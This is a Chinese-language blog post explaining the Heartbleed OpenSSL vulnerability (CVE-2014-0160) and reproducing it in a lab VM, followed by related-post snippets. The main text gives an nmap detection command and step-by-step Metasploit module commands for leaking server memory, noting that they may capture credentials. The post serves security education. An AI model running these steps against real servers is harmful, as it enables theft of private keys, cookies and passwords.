【漏洞】——心脏滴血(CVE-2014-0160)

最新推荐文章于 2024-04-09 19:30:00 发布
最新推荐文章于 2024-04-09 19:30:00 发布
阅读量1.8k 收藏 7
点赞数
分类专栏: TECHNOLOGY 文章标签: 漏洞 心脏滴血

漏洞范围:

OpenSSL1.0.1版本

漏洞成因:

Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露。

心脏出血(英语:Heartbleed),也简称为心血漏洞,是一个出现在加密程序库OpenSSL安全漏洞,该程序库广泛用于实现互联网的传输层安全(TLS)协议。它于2012年被引入了软件中,2014年4月首次向公众披露。只要使用的是存在缺陷的OpenSSL实例,无论是服务器还是客户端,都可能因此而受到攻击。此问题的原因是在实现TLS的心跳扩展时没有对输入进行适当验证(缺少边界检查),因此漏洞的名称来源于“心跳”(heartbeat)。该程序错误属于缓冲区过读,即可以读取的数据比应该允许读取的还多。(百度百科)

漏洞危害:

如同漏洞成因所讲,我们可以通过该漏洞读取每次攻击泄露出来的信息,所以可能也可以获取到服务器的私钥,用户cookie和密码等。

漏洞复现:

环境:本次环境使用 bee-box虚拟机(已集成该漏洞环境)进行测试。
bee-box虚拟机下载:链接

1.确定目标及端口信息。这里存在漏洞的靶机端口为8443。

2.使用nmap 的脚本进行检测漏洞是否存在。

nmap -sV -p 8443 --script ssl-heartbleed.nse 192.168.224.131

由下图检测结果可以看出存在心脏滴血漏洞。

3.github上也有一个项目,是专门检测心脏滴血漏洞的。链接点这里
本地环境试了一下好像不行,大家自行去分析吧,这个不是我讲的重点。

4.使用msf进行漏洞利用。
a) 打开msfconsole后,查找heartbleed模块:

#msf>search heartbleed

[图片上传中...(image.png-be8875-1514368932518-0)]

b) 使用第一个选项

#msf > use auxiliary/scanner/ssl/openssl_heartbleed

c) 查看需要设置哪些选项

#msf auxiliary(openssl_heartbleed) > show options

d) 这里我们需要设置RHOSTS,RPORT

e) 设置verbose,这个设置要设置成true才能看到泄露的信息

#msf auxiliary(openssl_heartbleed) > set  verbose true
(此设置主要是为了显示整个过程以及leak出来的数据,如果没有的话只显示如下图结果)

f) exploit

#msf auxiliary(openssl_heartbleed) > exploit

g) 如果有人在正在登录该web应用的话,还可能可以直接抓到账号密码等信息。

 

原文地址:https://www.jianshu.com/p/08600e2f4530

 

hy_coming
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
记录简单的心脏滴血CVE-2014-0160漏洞复现
New Wh1te Hat
03-16 482
记录简单的心脏滴血CVE-2014-0160漏洞复现 一、漏洞简介 2014年4月7日OpenSSL发布了安全公告,在OpenSSL1.0.1版本的心跳包模块存在严重漏洞CVE-2014-0160)。攻击者可以通过构造特殊的数据包,直接远程读取存在漏洞的OpenSSL服务器内存中多达64KB的数据,极有可能导致网站用户帐号密码等敏感数据被非法获取。漏洞发现者甚至声称可以直接获取到证书私钥和重要的商业文档。 二、影响范围 OpenSSL 1.0.1f 三、复现过程 fofa:header="Op
openssl(CVE-2014-0160心脏出血漏洞复现
m0_62008601的博客
08-02 1363
心脏出血是openssl库中的一个内存漏洞,攻击者利用这个漏洞可以服务到目标进程内存信息,如其他人的cookie等敏感信息。HeartbleedBug是流行的OpenSSL加密软件库中的一个严重漏洞。此弱点允许在正常情况下窃取受用于保护Internet的SSL/TLS加密保护的信息。SSL/TLS为Web、电子邮件、即时消息(IM)和一些虚拟专用网络(VPN)等应用程序提供Internet上的通信安全和隐私。...
OpenSSL 心脏滴血漏洞(CVE-2014-0160)漏洞讲解(小白可懂,简单详细)
wangluoanquan111的博客
04-09 1070
靶机:centos7 192.168.139.136攻击机:kali 192.168.139.129确保两台测试机网络能通从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。
心脏滴血漏洞复现(CVE-2014-0160)(docker实现)
m0_56010012的博客
03-07 2414
漏洞范围: OpenSSL1.0.1版本 ssl、tls、dtls介绍 在网络当中中,TCP/IP协议层之上的安全可以由Secure Socket Layer(SSL)及其替代协议Transport Layer Security (TLS)进行保障。这两个协议经常被称作SSL/TLS。HTTP是一个无状态的应用层协议,主要用来在服务器和客户端之间传输数据。HTTPS主要通过在HTTP层和TCP层之间增加了SSL/TLS层来保证服务器与客户端之间安全的传输数据。 DTLS(Datagram Transport
心脏滴血(HeartBleed) CVE-2014-0160 漏洞复现
Shadow_DAI_990101的博客
08-24 521
心脏出血漏洞”是指OpenSSL这个开源软件中的一个漏洞,因为该软件使用到一个叫做Heartbeat(中文名称为心跳)的扩展,恰恰是这个扩展出现了问题,所以才将这个漏洞形象的称为“心脏出血”。
心脏出血漏洞复现(CVE-2014-0160
GaLeng_Yang的博客
09-01 582
认识:首先简单介绍一下这个漏洞,该漏洞是一个出现在加密程序库OpenSSL的安全漏洞,这个程序呢,是在传输层协议TLS协议之上,这个协议呢被称为心跳协议,这个漏洞就是在心跳协议的工作过程中窃取到一些重要数据,因此这个漏洞的名字被称为心脏出血。危害:远程读取服务器内存中64K的数据,获取内存中的敏感信息,非法入侵获取到密码等加密数据。影响版本:OpenSSL的1.0.1版本到1.0.1f版本。
解决OpenSSL TLS 心跳扩展协议包远程信息泄露漏洞 (CVE-2014-0160)安全漏洞,升级OpenSSL到OpenSSL 1.0.1g
10-25
近期服务器开放的https的访问,确被安全组扫描出安全漏洞(OpenSSL TLS 心跳扩展协议包远程信息泄露漏洞 (CVE-2014-0160)),为修复该漏洞,升级OpenSSL到OpenSSL 1.0.1g,同时重新编译升级OpenSSH和nginx,在此提供...
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" ...
heartbleed-PoC:窃听漏洞利用以检索敏感信息CVE-2014-0160
05-09
首先,我阅读了关于该主题的两个最佳解释: 开发漏洞利用首先将握手发送到服务器cloudflarechallenge.com,以创建与tls的安全连接。 然后功能hit_hb(s)发送一个typcall心跳请求: hb = h2bin('''18 03 02 00 0301 ...
openssl 心血漏洞测试和利用工具(注意不是坑人的16K版本)
06-05
CVE-2014-0160 OpenSSL数组越界访问漏洞(Heartbleed心脏滴血)
msf简单利用心脏滴血指令
pzl01的博客
08-10 137
4进行配置:set rhosts IP #设置要攻击的IP。2选择攻击载荷:search heartbleed。3查看配置参数: show opentions。5运行 run 或者 exploit。1打开:msfconsole。获取到敏感隐私用户的信息。
Heartbleed心脏出血漏洞靶场搭建
fly小灰灰的专栏
01-12 6056
1. 简介   OpenSSL心脏出血漏洞原理是OpenSSL引入心跳(heartbeat)机制来维持TLS链接的长期存在,心跳机制作为TLS的扩展实现,但在代码中包括TLS(TCP)和DTLS(UDP)都没有做边界检测,所以导致攻击者可以利用这个漏洞来获得TLS链接对端(可以是服务器也可以是客户端)内存中的一些数据。    所以针对本次漏洞的检测,我需要在虚拟机中搭建一个通过https安全协议的数
CVE-2014-0160-心脏滴血漏洞
Amdy_amdy的博客
12-16 3079
心脏滴血漏洞-CVE-2014-0160 漏洞介绍 2014年4月7日,OpenSSL发布安全公告,在OpenSSL1.0.1版本至OpenSSL1.0.1f Beta1版本中存在漏洞,该漏洞中文名称为心脏滴血,英文名称为HeartBleed。其中Heart是指该漏洞位于心跳协议上,Bleed是因为该漏洞会造成数据泄露。即HeartBleed是在心跳协议上的一个数据泄露漏洞,OpenSSL库中用到了该心跳协议。HeartBleed主要存在与OpenSSL的1.0.1版本到1.0.1f版本。 利用该漏洞
心脏滴血漏洞——CVE-2014-0160
qq_59359593的博客
06-08 820
心脏出血是OpenSSL1.0.1版本至OpenSSL1.0.1f Beta1版本中存在漏洞,该漏洞中文名称为心脏滴血,英文名称为HeartBleed。其中Heart是指该漏洞位于心跳协议上,Bleed是因为该漏洞会造成数据泄露。即HeartBleed是在心跳协议上的一个数据泄露漏洞,OpenSSL库中用到了该心跳协议。HeartBleed主要存在与OpenSSL的1.0.1版本到1.0.1f版本。利用该漏洞,攻击者可以远程读取服务器内存中64K的数据,获取内存中的敏感信息。
心脏滴血漏洞(CVE-2014-0160)复现
baidu_38844729的博客
11-04 974
准备工作 使用shodan搜索相关站点 关键词:openssl/1.0.1a 访问地址 https://possible.lv/tools/hb/ 进行在线测试搜索到的站点,查看是否存在漏洞 方法一:利用Metasploit进行渗透 开启Metasploit,查找心脏滴血漏洞并利用 msfconsole search openssl_heartbleed use auxili...
CVE-2014-0160
最新发布
05-17
CVE-2014-0160,也被称为“心脏出血”(Heartbleed),是一个影响OpenSSL加密库的安全漏洞。该漏洞允许攻击者访问受影响服务器的内存,可能导致泄露敏感信息,如密码、私钥和其他加密数据。由于OpenSSL广泛用于许多...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值